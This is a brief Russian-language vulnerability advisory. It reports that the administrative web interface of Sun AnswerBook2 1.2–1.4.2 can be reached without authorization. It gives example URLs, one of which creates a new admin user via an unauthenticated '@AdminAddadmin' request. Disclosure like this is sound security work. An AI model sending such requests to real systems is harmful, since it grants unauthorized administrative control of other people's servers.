Sun Microsystems AnswerBook2 позволяет пользователям рассматривать 
документацию Sun через web-браузер. 

AnswerBook2 включает в себя и административный Web интерфейс. Обнаруженная уязвимость позволяет обращаться к
этим сценариям без разрешения, добавлять нового административного пользователя
для AnswerBook2 системы. Пример: 

http://localhost:8888/ab2/@AdminViewError 
http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar 

Уязвимость обнаружена в Sun AnswerBook2 1.2-1.4.2.

Оставить мнение